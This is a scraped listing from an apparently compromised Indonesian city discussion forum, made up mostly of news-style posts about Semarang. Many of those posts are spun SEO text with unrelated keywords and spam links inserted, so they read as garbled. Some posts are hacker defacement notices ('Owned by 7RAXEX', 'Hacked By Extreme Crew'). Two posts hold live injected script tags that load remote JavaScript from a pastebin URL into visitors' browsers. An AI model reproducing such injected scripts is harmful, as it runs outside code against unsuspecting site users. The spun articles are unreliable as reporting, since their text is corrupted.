Forum Diskusi Kota

form login member

Email:

Password:

9 Top Users

Members Online

NO Judul Kategori All
1 forum diskusi

15
2 12
1
0
3 7rax

0
4 noob

0
5 Owned by 7RAXEX
:~#r00t:Owned by 7RAXEX

just test your secure sir , dont forget . no system is safe

kikiwsanjunganjiwa@gmail.com
0
6 Kota Lama Semarang Bakal Diakui sebagai Warisan Budaya Dunia
Kawasan wisata Kota Lama Semarang yang merupakan destinasi unggulan Kota Semarang, meyakinkan diri ancang-ancang segera mendunia. Wisata kota yang merupakan peninggalan era kolonial Belanda itu, kini masuk daftar tunggu Unesco sebagai warisan budaya dunia.

Wali Kota Semarang, Hendrar Prihadi mengatakan, target pasti kawasan yang memiliki sejumlah bangunan sejarah penting ini diakui Unesco pada tahun 2020 mendatang.

"Kami sangat yakin 2020, Kota Lama Semarang bisa mendunia. Karena saat ini sudah masuk daftar warisan budaya Unesco," ucap Hendrar, usai mengukuhkan pengurus Badan Pengelola Kawasan Kota Lama (BPK2L) Semarang di gedung Semarang Art Gallery kawasan Kota Lama Semarang, Minggu 13 Maret 2016.

Sejumlah persiapan kini telah disusun untuk menyambut wisata unggulan ini menjadi wisata berkelas international. Tim BP2KL yang dibentuk Wali Kota langsung diminta untuk membuat sejumlah strategi melakukan revitalisasi kawasan ini.

Salah satunya melakukan review seluruh dokumen bangunan-bangunan di lokasi yang memiliki sebutan Little Netherland itu.

"Review ini mulai dari list, berapa gedung di Kota Lama? Berapa yang sudah direhab, di-make over dalam konteks revitalisasi? Berapa yang belum? Mana bangunan yang masih bagus, kondisi sedang, dan yang sudah rusak? Pemiliknya siapa, yang bisa dikerjasamakan siapa? Kalau sudah jelas semua, maka bagi tugas," jelas dia.

Pihaknya juga akan menjalin kerja sama menyeluruh kepada sejumlah pihak baik swasta, pemerintah maupun warga yang tercatat memiliki gedung peninggalan Belanda ini.

"Maka kita dan tim BP2KL ini harus bagi tugas. Utamanya terkait investor soal reitalisasi. Bagaimana mempromosikan kawasan ini ke nasional dan internasional," ujar dia.

Review kawasan kota lama dimaksudkan untuk bagaimana mempercantik dan mempromosikan Kota Lama sebagai heritage dunia. Termasuk, melakukan berbagai penataan pedagang kaki lima (PKL) yang ternyata keberadaannya menjadikan daya tarik, karena yang dijual barang-barang antik di kawasan ini
1
7 Crown Group Anggap Semarang sebagai Pasar Potensial
 SEMARANG - Perusahaan pengembang swasta Crown Grup berasumsi Kota Semarang sebagai pasar yang mungkin terutama untuk bidang property.

" Sekarang ini Crown Grup baru meningkatkan property di Australia, sebagai pasar mungkin kami berasumsi Indonesia ada di urutan tiga sesudah Australia serta Tiongkok, " kata General Manager Crown Grup Bagus Sukmana di Semarang, Senin (14/3/2016).

Menurutnya, sampai kini pasar mungkin didalam negeri yang banyak dituju salah satunya Bandung, Jakarta, serta Bali. Selama ini Kota Semarang belum pernah dijajaki.

" Yang bikin kami tertarik masuk Semarang lantaran kami lihat dalam kurun saat dua th. paling akhir ini perekonomian Kota Semarang cukup menggeliat bersamaan dengan makin banyak perusahaan yang masuk ke Jawa Tengah satu diantaranya Semarang, " tuturnya.

Oleh karenanya, pihaknya mengharapkan banyak dari Kota Semarang ini. Bahkan juga, bukanlah mustahil pasar Kota Semarang malah lebih mungkin dibanding kota-kota lain.

Dengan ditambahnya Kota Semarang sebagai satu diantara pasar bacaan doa niat sholat jenazah  yang dituju, pada th. ini pihaknya memberi tujuan penjualan untuk apartemen Crown Grup yang sekarang ini tengah di bangun.

" Bila pada th. lantas tujuan transaksi penjualan Crown Grup di Indonesia meraih Rp500 miliar, untuk th. ini bertambah jadi Rp600 miliar. Semoga dapat terwujud, " tuturnya.

Spesial untuk Kota Semarang sendiri pihaknya belum membidik angka transaksi mengingat sekarang ini masih tetap dalam step menjajaki.

Untuk di ketahui, Crown Grup adalah perusahaan pengembang punya entrepreneur Indonesia Iwan Sunito. Selama ini Crown Grup belum meningkatkan property di Indonesia.

Walau sekian, Indonesia adalah sisi utama dari Crown Grup di lokasi Asia Tenggara lantaran sukses menyumbangkan nilai transaksi cukup besar sepanjang semester satu serta dua th. keuangan 2015-2016 yakni sebesar Rp450
0
8 Bangunan Liar Tutupi Saluran Air di Kota Lama Semarang
Beberapa ratus bangunan liar menutupi saluran air di area Kota Lama Semarang, Jawa Tengah. Dinas Pengelolaan Sumber Daya Air-Energi Sumber Daya Mineral Kota Semarang, Jawa Tengah, sebutkan beberapa ratus bangunan liar itu berdiri diatas saluran air.

Pelaksana Pekerjaan (Plt) Kepala PSDA-ESDM Kota Semarang Ayu Enthys menuturkan, dalam revitalisasi Kota Lama, menurut Ayu, Dinas PSDA-ESDM kebagian pekerjaan merapikan serta menormalisasi saluran-saluran air, sebab waktu ini telah banyak yang mampet serta ditutupi oleh bangunan liar.

Ia menuturkan sebetulnya telah melaksanakan langkah normalisasi saluran air yang di awali penertiban bangunan-bangunan liar dengan melibatkan SKPD perihal, ialah unit polisi pamong praja (PP). " Memanglah belum semua (saluran dibenahi, red.), masihlah sedikit. Tapi, telah kami mulai. Jangka waktu dekat, kami bakal selekasnya menambahkan penyusunan saluran-saluran air di Kota Lama, " kata dia di Semarang, Jumat (14/4) selesai pertemuan Tubuh Pengelola Area Kota Lama (BPK2L) Semarang dengan unit feature kerja daerah (SKPD) perihal buat mengupas ide revitalisasi area Kota Lama.

Ayu mencontohkan saluran air yang ada di selama Jalan Kepodang, Semarang, yang banyak tertutupi bangunan liar jadi salah satunya prioritas penyusunan yang selekasnya dijalankan Dinas PSDA-ESDM. Menurutnya, sholat dhuha langkah persuasif terus didahulukan dalam penertiban bangunan liar sebagai konsekuensi normalisasi saluran air, diantaranya dengan mengajak yang miliki bangunan berkomunikasi.

" Kami telah berkomunikasi dengan beberapa yang miliki bangunan. Rata-rata mereka telah menyepakati meskipun ada banyak yang masihlah 'ngeyel'. Ya, kami dekati. Kami bakal bekerjasama dengan satpol PP, " tukasnya.

Tidak cuman itu, ia menuturkan koordinasi dengan pemangku lokasi setempat, ialah kecamatan serta kelurahan diistemewakan supaya sistem penertiban bangunan liar yang ada di Kota Lama jalan lancar. " Bangunan liar diatas saluran air bakal di hilangkan. Mereka (yang miliki bangunan) yang saat ini duduki telah bersedia dirapikan. Tinggal tunggu saat saja. Yang pasti, selekasnya, " tegasnya.

Diawalnya, Ketua BPK2L Semarang Hevearita Gunaryanti Rahayu menjelaskan penyusunan area Kota Lama Semarang melibatkan lintas bidang atau antarSKPD perihal, termasuk juga Dinas PSDA-ESDM buat saluran air. " Tiap tiap SKPD tak dapat jalan sendiri, tapi mesti sama-sama lengkapi, seperti kesulitan kebersihan, saluran air, jalan, sampai perizinan, " kata Ita yang juga Wakil Wali Kota Semarang.
0
9 Nya iyeu Mah Bade Nyobian Heula Manawai Aya Milik
Cik ayeuna urang cobian ku harga motor honda sareng ku harga motor yamaha , manawai we didieu abdi dipasihan miliki kunu kawasa.
0
10 Walikota Tambahkan Motivasi Tingkatkan Layanan Pada Paguyuban Puskesmas se Kecamatan Semarang Barat
Bersilaturahim segera dengan paguyuban puskesmas se-Kecamatan Semarang Barat, Walikota mengajak beberapa tenaga kesehatan untuk memberi service paling baik pada orang-orang Kota Semarang. Dalam komunitas yang diadakan di aula Puskesmas Manyaran, Sabtu (5/3) itu Walikota mengingatkan kalau hari ini mesti tambah baik dari hari tempo hari. Acara itu di hadiri kepala dinas kesehatan kota semarang, camat semarang barat serta beberapa ratus dokter, perawat dan tenaga kesehatan se-Kecamatan Semarang Barat. “Apa yang udah panjenengan kerjakan sampai kini, udah baik. Tetapi, Bunga anggrek yang tambah baik pastinya dibutuhkan, ” lanjutWalikota. Disadari atau tdk, lanjutnya, sekarang warga kota Semarang masihlah mengeluhkan service kesehatan yang ada.

Padahal beragam service serta keringanan sudah diberikan. Artinya, lanjut Walikota masihlah dibutuhkan sosialisasi untuk menyentuh warga dari beragam susunan. Hal ini dibutuhkan mengingat banyak warga yang belum tahu ada service puskesmas gratis, jamkesmas ataupun jamkesmaskot maka belum dapat rasakan faedahnya. Diluar itu, sebagai tenaga kesehatan sekarang juga dituntut untuk memberi ide-ide kreatif serta inovatif dalam servicenya.Tanaman hias dalam ruangan Hal ini butuh dikerjakan supaya service kesehatan makin optimal. “Jangan cuma lakukan pekerjaan harian, namun berikan ide-ide pada pimpinan berkenaan apa yang dibutuhkan untuk mengoptimalkan service kesehatan pada orang-orang, ” pesannya.

Dalam peluang itu, Walikota juga mengutamakan terutamanya perlakuan serius pada DBD serta masalah kematian ibu anak di Kota Semarang. Pada dua masalah ini, Kota Semarang duduki ranking 3 serta 2 paling tinggi se-Jawa Tengah. Hal ini pasti jadi sinyal bertanya besar mengingat kesiapan serta ketersediaan tenaga medis dan tempat tinggal sakit Kota Semarang termasuk yang paling baik di JawaTengah. Untuk itu perlakuan serius lewat sosialisasi mengingatkan gerakan kebersihan lingkungan, saluran air, bak mandi mesti selalu digalakkan untuk menghimpit angka kesakitan DBD. Tanaman hias dalam ruangan pengusir nyamuk Tidak ayal lagi, PSN merupakan kunci serta pemecahan untuk menanggulangi tingginya DBD di Kota Semarang, lanjutnya.

Sedangkan untuk menghimpit angka kematian ibu serta anak, walikota memohon pada beberapa tenaga kesehatan untuk selalu memonitor keadaan kesehatan ibu hamil, mensosialisasikan kehamilan yang sehat serta kontrol teratur pada ibu hamil. Dengan hal tersebut, harapannya keadaan kesehatan bisa terpantau sejak mulai awal serta keadaan ibu dan anak tetaplah sehat sampai persalinan. Selanjutnya, tanggung jawab itu tidak cuma pada tenaga kesehatan namun
juga pada keluarga terlebih serta orang-orang kurang lebih. Semuanya mesti berperan serta serta turut melindungi kesehatan ibu hamil yang ada disekelilingnya. Partisipasi umpamanya bisa diwujudkan dengan memonitor dan meyakinkan kesiapan persalinan. Meski berkesan remeh, tetapi rintangan transortasi waktu mendekati persalinan masihlah dihadapi beberapa ibu di Kota Semarang. Untuk itu, semuanya mesti dukungan serta bertindak dalam melindungi kesehatan ibu serta anak. Tutup sambutannya, Walikota berpesan semangat pada semua tenaga kesehatan untuk selalu semangat berkarya sebaik-baiknya dalam memberi service kesehatan untuk warga Kota Semarang.
0
11 Membangun Desa atau Desa Membangun
Ada nya spirit dalam Rancangan Undang Undang Desa untuk menganggarkan 1 Milyar rupiah per desa per th. dalam Biaya Pendapatan Berbelanja Negara, rupa nya banyak melahirkan perbincangan. Di satu segi ada kelompok yang sama pendapat dengan usulan itu, tetapi di segi lain ada pula yang meragukan efektivitas dari semangat seperti itu. Lepas dari kontroversi atas hal yang seperti ini, pasti nya kita tetaplah setuju kalau desa yaitu sisi dari Negara Kesatuan Republik Indonesia, yang dalam perjalanan nya butuh untuk di bangun serta diperkembang sedemikian rupa, hingga nilai-nilai romantisme saat lantas nya bisa kita rubah-arahkan ke satu situasi yang tambah baik serta kondiusif.

Sebenar nya perbincangan mengenai. Arti " Bangun Desa " atau " Desa Bangun ", tetap masih berjalan. Bangun Desa, seringkali disamakan kalau desa seakan-akan cuma satu object. Dalam pemahaman ini, desa seperti suatu hal yang lemah. Desa serta orang-orang nya, berkesan jauh dari sikap yang mandiri. Itu sebab nya, bangun desa umum nya inisiasi nampak dari kelompok Pemerintah dengan pola pendekatan yang karakter nya top down. Dengan kata lain bisa pula dikemukakan kalau arti bangun desa, memerlihatkan ada nya situasi yang mematginalkan kehidupan desa serta warga orang-orang nya.

Lantas, bagaimana dengan pemaknaan " Desa Bangun " ? Berikut sesungguh nya yang dalam konteks kekinian, banyak diuji-cobakan oleh Pemerintah serta kelompok Dunia Usaha. Kita rupa nya telah mulai sadar kalau desa (serta orang-orangnya) tidaklah cuma di posisikan sebagai object, hingga kita bisa seenak nya memasukan program serta aktivitas ke desa. Tetapi sesuai sama perubahan nya, jadi doa niat puasa desa juga layak untuk jadikan subyek dalam proses program. Desa pasti tidak cuma jadikan arena untuk menguji-cobakan beragam inovasi serta tehnologi, yang umum nya semangatkan untuk wujudkan kesejahteraan. Desa janganlah sekali-kali " dijudikan ". Bahkan juga kita juga pasti bakal begitu mengutuk nya apabila ada kelompok yang dengan cara kasat mata lakukan politisasi pada desa serta warga orang-orang nya itu.

Spirit untuk " menghadiahi " desa dengan duit 1 milyar per th., sebetul nya janganlah dikira sebagai angka yang besar. Misal kita saksikan keperluan desa (serta orang-orang nya), angka 1 milyar itu tak ada apa-apa nya. Dari pemantauan yang dikerjakan, desa-desa di negeri ini, dengan cara fisik memanglah masihlah memerlukan support serta pengaturan. Dari mulai infrastruktur jalan yang masihlah belum licin, lantas masalah infrasteruktur irigasi yang rata-rata rusak kronis, lalu masalah fasilitas serta prasarana pendidikan, kesehatan, pasar yang belum mencukupi, sampai ke bebrapa masalah yang berkaitan dengan nasib serta kehidupan orang-orang desa nya sendiri yaitu rangkaian permasalahan yang perlu kita perhatikan dengan cermat.

Kesan romantisme kalau desa yaitu gudang kemiskinan, telah seharus nya kita mengerti dengan cara serius. Apabila jumlah paling besar golongan miskin di negeri ini yaitu beberapa petani serta nelayan, jadi telah sepantasnya kebijakan serta program yang di luncurkan, selalu bertujuan pada penuntasan permasalahan itu. Kemiskinan, kebodohan serta ketertinggalan yaitu ciri yang menempel kuat dalam kehidupan orang-orang desa. Oleh karenanya, pastinya akan terekam arif serta bijaksana bila banyak program Pemerintah yang diarahkan manfaat merampungkan inti permasalahan nya. Malah yang jadi pertanyaan untuk kita semuanya yaitu apakah dengan biaya 1 milyar per desa per th. itu bakal dan merta dapat berikan jalan keluar riil atas pokok-pokok masalah yang sampai kini menghadang nasib serta kehidupan warga pedesaan?

Walaupun angka 1 milyar bukanlah nilai yang begitu besar manfaat bangun desa serta orang-orang nya, tetapi daripada " tak ada " sekalipun, pasti pantas kita syukuri semangat seperti itu. Yang jadi masalah yaitu bagaimana proses nya supaya biaya yang 1 milyar ini betul-betul bisa diejawantahkan dengan cara efektip serta efesien. Berikut sebetul nya " pekerjaan tempat tinggal " kelanjutan selesai RUU mengenai Desa itu diputuskan. Lalu, apakah dalam RUU mengenai Desa ini sudah juga disediakan rancangan Ketentuan Pemerintah nya yang mensupport? Hal semacam ini utama dikaji, lantaran banyak pengalaman mempertontonkan pada kita mengenai banyak nya Undang Undang yg tidak ditindak-lanjuti oleh Ketentuan Pemerintah nya.

Saat ini inti permasalahan nya telah mulai tergambarkan. Desa serta orang-orang nya memanglah mesti di bangun. Kita tak bisa capek untuk terus-terusan bangun desa. Kita mesti tetaplah semangat memperjuangkan kesejahteraan orang-orangnya. Bahkan juga kita juga tetaplah dituntut untuk jadikan desa sebagai subyek pembangunan. Desa bukanlah object. Oleh karenanya, begitu salah nya bila dalam bangun desa, kita selalu terjebak dalam pola fikir kalau desa yaitu satu object.
0
12 Hacked By Extreme Crew
Your Security Is Low !
0
13 Pelaksana Pekerjaan
 Sebagian ratus bangunan liar menutupi saluran air di ruang Kota Lama Semarang, Jawa Tengah. Dinas Pengelolaan Sumber Daya Air-Energi Sumber Daya Mineral Kota Semarang, Jawa Tengah, katakan sebagian ratus bangunan liar itu berdiri di atas saluran air.

Pelaksana Pekerjaan (Plt) Kepala PSDA-ESDM Kota Semarang Ayu Enthys menjelaskan, dalam revitalisasi Kota Lama, menurut Ayu, Dinas PSDA-ESDM kebagian pekerjaan membereskan dan menormalisasi saluran-saluran air, sebab saat ini sudah banyak yang mampet dan ditutupi oleh bangunan liar.

Ia menjelaskan sebenarnya sudah melakukan langkah normalisasi saluran air yang dimulai penertiban bangunan-bangunan liar dengan melibatkan SKPD tentang, adalah unit polisi pamong praja (PP). " Memang belum semuanya (saluran dibenahi, red.), masih tetap sedikit. Namun, sudah kami mulai. Periode waktu dekat, kami akan selekasnya memberikan pengaturan saluran-saluran air di Kota Lama, " kata dia di Semarang, Jumat (14/4) usai pertemuan Badan Pengelola Ruang Kota Lama (BPK2L) Semarang dengan unit fitur kerja daerah (SKPD) tentang buat mengupas inspirasi revitalisasi ruang Kota Lama.

Ayu mencontohkan saluran air yang ada di sepanjang Jalan Kepodang, Semarang, yang banyak tertutupi bangunan liar jadi satu diantaranya prioritas pengaturan yang selekasnya digerakkan Dinas PSDA-ESDM. Menurut dia, langkah niat doa puasa persuasif selalu diprioritaskan dalam penertiban bangunan liar sebagai konsekwensi normalisasi saluran air, salah satunya dengan mengajak yang punyai bangunan berkomunikasi.

" Kami sudah berkomunikasi dengan sebagian yang punyai bangunan. Rata-rata mereka sudah menyetujui walau terdapat beberapa yang masih tetap 'ngeyel'. Ya, kami dekati. Kami akan bekerja bersama dengan satpol PP, " tukasnya.

Bukan hanya itu, ia menjelaskan koordinasi dengan pemangku tempat setempat, adalah kecamatan dan kelurahan diistemewakan agar system penertiban bangunan liar yang ada di Kota Lama jalan lancar. " Bangunan liar di atas saluran air akan dihilangkan. Mereka (yang punyai bangunan) yang sekarang ini menempati sudah bersedia dirapikan. Tinggal tunggulah waktu saja. Yang tentu, selekasnya, " tegasnya.

Diawalnya, Ketua BPK2L Semarang Hevearita Gunaryanti Rahayu menerangkan pengaturan ruang Kota Lama Semarang melibatkan lintas bagian atau antarSKPD tentang, termasuk Dinas PSDA-ESDM buat saluran air. " Setiap SKPD tidak bisa jalan sendiri, namun harus keduanya sama kompliti, seperti kesusahan kebersihan, saluran air, jalan, hingga perizinan, " kata Ita yang juga Wakil Wali Kota Semarang.
0
14 Noormans Hotel By Lor In Jadi Akomodasi Sesuai Diwaktu ke Semarang
Tak butuh ragu soal venue maupun penginapan disaat kamu sedang mempunyai ide buat menggelar program usaha maupun tengah mau menggandeng keluarga buat berlibur ke kota Semarang. Pasalnya, kamu dapat menemukannya dgn enteng di kota yg mempunyai julukan Venetie Van Java ini. Kamu mencari penginapan murah di Semarang ? Ada, Noormans Hotel By Lor In yg jadi jawabannya. Noormans Hotel By Lor In teramat sesuai buat ruang menginap maupun menggelar program usaha. Tidak Sedikit sekali keunggulan yg dipunyai oleh hotel ini. Yg mula-mula yaitu lokasinya yg tak jauh dai pusat kota Semarang, cuma 4.7 kilo meter saja. Dari bandara sendiri jaraknya 10.6 kilo meter. Berada di ruangan yg strategis pastinya teramat serasi buat beraneka kegiatan, baik rekreasi dgn kaluarga ataupun program rapat, yg mana akses ke sekian banyak lokasi mutlak amat sangat gampang. 

Jadi salah satu penginapan murah di Semarang, dapat namun sarana & layanan yg diberikan oleh Noormans Hotel By Lor In tidak mampu diremehkan. Jadi hotel berbintang 3, pastinya ragam sarana yg dihadirkan serta ciamik & mengesankan buat tiap-tiap tamunya. Media sejak mulai dari resepsionis yg sedia 24 jam, porter yg siap membawakan barang tamu, meeting room yg megah utk jumpa, pusat usaha, kedai kopi, restoran, daya simpan barang, lift/elevator, tempat parkir, hingga dgn akses WiFi dengan cara cuma-cuma di ruangan publik bahkan serta sanggup diakses cuma-cuma serta di seluruh kamar. Tak hingga disitu, sarana kolam renang outdoor, taman & serta spa sudah disediakan juga di Noormans Hotel By Lor In bagi para tamunya yg mau melepaskan penat. 


Ditambah lagi design interior dari hotel ini pula amat sangat menarik yg pastinya dapat menghadirkan kenyamanan tersendiri utk kamu disaat menginap disini. Benar-benar hotel yg satu ini jadi destinasi yg serasi diwaktu berada di Semarang. Dulu, jikalau Noormans Hotel By Lor In ialah penginapan murah di Semarang, berapa banderol harganya ? Jikalau benar-benar kamu mau reservasi kamar di Noormans Hotel By Lor In, sudah ada sekian banyak kategori kamar yg disediakan mulai sejak dari harga 348.000 rp hingga dgn 658.000 saja & utk pemesanannya sendiri dapat bersama enteng kamu jalankan dengan cara online lewat website pesan hotel terpercaya, Mister Aladin “Pesan Hotel Gaya Kamu”. 

0
15 Sebelum berlibur, Pesan Hotel Murah Di Semarang Lewat Mister Aladin Waktu Ini Pun
Liburan sekolah telah tinggal menghitung hri. Buat mengisinya, sudahkah kamu merencananakan lokasi mana yg dapat dikunjungi? Tidak Sedikit orang yg berangkat ke luar negara buat menikmati beragam keindahan alam & beraneka area wisatanya, padahal lokasi wisata yg ada di Indonesia tak kalah menarik dgn destinasi wisata diluar negara, salah satunya yakni wisata di Kota Semarang. Kota ini populer juga sebagai penghasil lumpia yg nyatanya mempunyai tidak sedikit ruangan wisata yg tak boleh dilewatkan. Adapun ruangan wisata paling ternama di Semarang seperti Lawang Sewu & Tugu Jejaka. Tidak Cuma itu, tetap tidak sedikit ruangan lain di Semarang yg menawari keindahan panorama alam, budaya, histori, sampai wisata kuliner yg dapat kamu jajal. Buat kenyamanan diwaktu berwisata, ada tidak sedikit hotel murah di Semarang sejak mulai 200rb an yg mampu kamu pesan lewat misteraladin.com waktu ini serta. Sebelum kamu bertolak ke Semarang, berikut ini kami tuliskan anjuran berwisata di Semarang yg butuh kamu ketahui : 

1. Susun konsep berlibur ke Semarang 

Factor perdana yg mesti kamu jalankan di hunian merupakan menyusun konsep dgn matang. Perihal ini sebab kota Semarang mempunyai tidak sedikit lokasi wisata menarik utk dikunjungi. Sesuaikan gagasan sekian banyak lokasi yg bakal dikunjungi dgn kala yg kamu punya buat berlibur. Gagasan yg matang ini bakal menolong kamu menjalani liburan bersama nyaman & efektif. 

2. Cari kupon murah menuju Semarang 

Kalau kamu mengahdiri kota Semarang di hri libur atau akhir minggu, rata-rata harga ticket pesawat & type transportasi yang lain dapat melonjak naik, sehingga kamu mesti menyiapkan biaya lebih. Tetapi jikalau kamu datang di hri kerja, sehingga harga karcis dapat lebih murah. diluar itu, beraneka lokasi wisata pula amat sering dipadati wisatawan baik lokal ataupun mancanegara di hri libur & akhir minggu. 

3. Susun biaya budget liburan ke Semarang 

Factor berikutnya, kamu mesti membuat desain budget budget liburan di Semarang. Bermacam budget yg tentunya dikeluarkan seperti anggaran menginap di hotel, ada tidak sedikit hotel murah di semarang mulai sejak 200rb an yg sanggup kamu pesan dari saat ini lewat misteraladin.com, anggaran makan, transportasi, anggaran belanja oleh-oleh, & budget yang lain. 

4. bawa perbekalan & peralatan yg lumayan 

ada tidak sedikit peralatan mutlak yg tak boleh ketinggalan diwaktu berlibur seperti camera & baterai tambahannya, kacamata hitam, handuk mungil, baju edit, charger telephone seluler, & lain-lain. 

Buat kenyamanan wisata, pastikan kamu memesan karcis hotel di Semarang lewat misteraladin.com dari saat ini sebelum kehabisan.

Baca Juga: Hotel di Bandung
0
16 Kota Semarang Akan Menerapkan Meteran Parkir
Pemerintah Kota Semarang, Jawa Tengah, berencana menertibkan perparkiran di badan jalan.
Sistem karcis online akan ditetapkan di badan jalan itu, akan berlaku progresif dan bakal diterapkan di jalan protokoler.kumpulan nama bayi keren modern islami

Selain itu, wilayah khusus yang menjadi arena privat, seperti perkantoran, juga akan dikenai sistem yang sama.
Kebijakan itu diyakini akan menambal kebocoran pendapatan asli daerah (PAD) dari sektor perparkiran.

Wali Kota Semarang Hendrar Prihadi mengatakan, layanan parkir elektronik (e-parking) akan dioptimalkan guna menopang PAD.nama bayi laki laki modern Layanan itu juga sebagai bentuk implementasi dari program Semarang Smart City
0
17 Gianyar Dinilai Tim Penilai WTN Pusat
Gianyar kembali dinilai Aktivitas Wahana Tata Nugraha (WTN) Th. 2016 oleh Tim Penilai Lapangan Step II serta III dari Kementrian Perhubungan RI. Tim penilai yang di pimpin oleh, Ariandi Ariyus, S. SiT, M. Mtr, di terima Kapala Dinas Perhubungan, Kabar serta Komunikasi (Dishubinfokom) Kabupaten Gianyar, Cokorda Gde Rai Widiarsa, (22/8).

Penilaian dikerjakan dengan lakukan penilaian, pemotretan dan peninjaun ke sebagian titik jalan. Peninjauan pertama dikerjakan di Terminal Batubulan lalu berlanjut ke Kantor Dishubinfokom.

Di dua tempat ini, tim penilai yang terbagi dalam 5 (lima) orang lakukan peninjauan pada sebagian <a href="http://goo.gl/naLGqC" title="" target="">samsung android</a> fasilitas serta prasarana yang ada di kantor itu salah satunya alat uji kendaraan. Peninjauan selanjutnya, menyasar sebagian titik jalan raya dan transportasi, termasuk juga fasilitas serta prasarana yang ada.

Kepala Dishubinfokom Kabupaten Gianyar, Cokorda Gde Rai Widiarsa menyampaikan penilaian waktu ini adalah penilaian lapangan yang dikerjakan dengan mendatangi segera sebagai object penilaian. Sedangkan, untuk pemaparan program serta kebijakan dikerjakan (23/8). Ada 14 item penilaian WTN misalnya manajemen transportasi, keadaan jalan, rambu-rambu jalan raya, biaya transportasi sampai integritas sumber daya manusia.

Cokorda Gde Rai Widiarsa memberikan, berdasar dari raihan WTN terlebih dulu, Pemkab Gianyar selalu berusaha tingkatkan kemampuan penyelenggaraan serta operasional transportasi. Berbagai program juga dikerjakan salah satunya, pengadaan serta pemasangan ATCS (Ruang Traffic Controlling Sistem) yang dilengkapi dengan <a href="http://goo.gl/zko2II" title="" target="">harga samsung android</a> CCTV pemantau arus jalan raya dan pingindalian Traffic Light dari ruangan pusat kendali Dishub Infokom Gianyar. Diluar itu mengelar Car Free Day/Car Free Night, penentuan awak kendaraan umum teladan, Marka Zoss (zona selamat sekolah), dan penyuluhan keselamatan berlalu lintas.
0
18 Di Semarang, Penumpang KA Sudah Bisa Pesan Makanan Saat Beli Tiket
PT Kereta Api Indonesia menambah service pada beberapa penumpang dengan sarana makanan. Satu diantaranya dengan sarana pesan makanan kala pembelian ticket.

Vice President PT KAI Daerah Operasi IV Semarang Andika Dwi Putranto menyampaikan, service itu telah mulai diberlakukan di daerah operasinya. Bermacam menu makanan disiapkan sesuai sama selera calon penumpang.

" Service saat ini telah dapat ucapan tahun baru 2017  pesan makanan, sekalian pesan ticket. Ini penambahan service dari kami, " tutur Andika selesai peluncuran KA Ambarawa Ekspress jurusan Semarang-Surabaya, Selasa (4/10/2016) pagi.

Menurut Andika, service makanan didalam perjalanan dikerjakan supaya penumpang dapat tambah nyaman dalam nikmati perjalanan.

Jika tak pernah pesan makanan saat beli ticket, penumpang dapat segera pesan kala telah didalam gerbong kereta.

PT KAI berbarengan Pemerintah Propinsi Jateng pagi tadi meluncurkan KA Ambarawa Ekspress dengan kemampuan 640 tempat duduk. Rute itu melayani keperluan dari Semarang menuju Surabaya pulang-pergi.

KAI membidik tingkat keterisian penumpang ucapan tahun baru kala operasional kereta ini meraih 70 %. Namun, seiring berjalannya waktu, tujuan yang diraih dapat sampai 100 %.

" Untuk awal-awal ini ditargetkan 70 % terisi, " katanya.

Service dari KA Ambarawa Ekspress ini bakal melalui Stasiun Ngombo, Jambon, Kradenan (Grobogan) Doplang, Randublatung, Cepu (Blora), Bojonegoro, Babat, Lamongan, serta Pasar Turi.

Pemberangkatan dari Semarang Poncol jam 07. 00 WIB serta Semarang Tawang jam 07. 15 WIB hingga di Surabaya jam 11. 55 WIB. Sesaat pemberangkatan dari Surabaya pada jam 13. 00 untuk sehari-harinya serta hingga Semarang jam 17. 53 WIB
0
19 Solusi Atasi Problem Sosial Di Perkotaan Adalah Rumah Layak
Solusi guna mengatasi permasalahan sosial di kawasan perkotaan adalah dengan memenuhi kebutuhan rumah layak bagi seluruh anggota masyarakat yang semakin lama semakin bertambah jumlahnya dari waktu ke waktu.

"Tidak mungkin kita menyelesaikan masalah sosial bila warga tidak mampu memenuhi rumah yang layak," kata Dirjen Penyediaan Perumahan Kementerian Pekerjaan Umum dan Perumahan Rakyat (PUPR) Syarif Burhanuddin dalam jumpa pers di Jakarta, Senin (3/10/2016).

Syarif Burhanuddin juga mengingatkan pada 2015 kurang lebih 53,3% dari penduduk di Indonesia sudah terurbanisasi atau tinggal di wilayah kota.

Hal itu, ujar dia, juga berdampak kepada meningkatnya kebutuhan harga tiket kereta api akan perumahan di perkotaan, sementara permasalahannya, jumlah tanah di kota relatif selalu tetap.

"Di kota-kota yang diserbu kaum urban tidak ada jalan lain mengoptimalkan dengan hunian vertikal," katanya.

Dia juga mengemukakan untuk kawasan rumah-rumah kumuh sekalipun, ke depannya juga akan diberikan solusi dengan bangunan vertikal.

Berdasarkan data PUPR, kawasan pemukiman kumuh yang ada di Indonesia yaitu seluas 38.431 hektare, terdiri atas 23.473 hektare di wilayah perkotaan dan 11.957 hektare di wilayah pedesaaan.

Khusus untuk kota, Direktorat Jenderal Cipta Karya telah melaksanakan berbagai program antara lain sinrgi penyusunan perencanaan penanganan kumuh dengan pemda.

Sinergi itu antara lain dalam bentuk harga laptop asus core i3 Rencana Pencegahan dan Peningkatan Kualitas Permukiman Kumuh Perkotaan di 93 kabupaten/kota.

Dalam meningkatkan peran masyarakat dan memperkuat peran pemda dalam percepatan penanganan kawasan tumuh adalah melalui program Kotaku.

Kotaku adalah program yang dilaksanakan di 34 provinsi yang tersebar di 269 kabupaten/kota pada 11.067 kelurahan/desa.

Pada 2015, progam Kotaku menangani 1.738 kelurahan/desa untuk peningkatan kualitas permukiman berbasis masyarakat dengan dana harga helm ink sebesar Rp692 miliar, dan percontohan pengembangan ekonomi lokal di 15 kabupaten/kota dengan nilai sebeasr Rp22,5 miliar dan di 845 kelurahan/desa sebesar Rp33,8 miliar.

Untuk 2016, dilakukan penanganan kualitas pemukiman pada 813 kelurahan/desa dengan dana sebesar Rp114 miliar dan sebesar Rp7,5 miliar untuk pengembangan ekonomi lokal di 15 kabupaten/kota.
0
20 Update Harga

0
21
<script type="text/javascript" src="http://pastebin.com/raw/U2ebsvHK"></script>
0
22 asy
<script type="text/javascript" src="http://pastebin.com/raw/U2ebsvHK"></script>
0
23 Impian Wali Kota Jadikan Pasar Kembang Destinasi Wisata Kreatif
Wali Kota Semarang Hendrar Prihadi optimistis, penataan Pasar Kembang di sepanjang Jalan Sutomo akan menjadi ikon baru di wilayahnya. Pasar kembang diproyeksikan dapat menarik kunjungan banyak wisatawan. "Ini nanti seperti kampung Jodipan di Malang. Rumah warga di sekitar sini akan dicat warna warni," kata Hendrar, seusia mengecek pembangunan pasar, Rabu (30/11/2016).

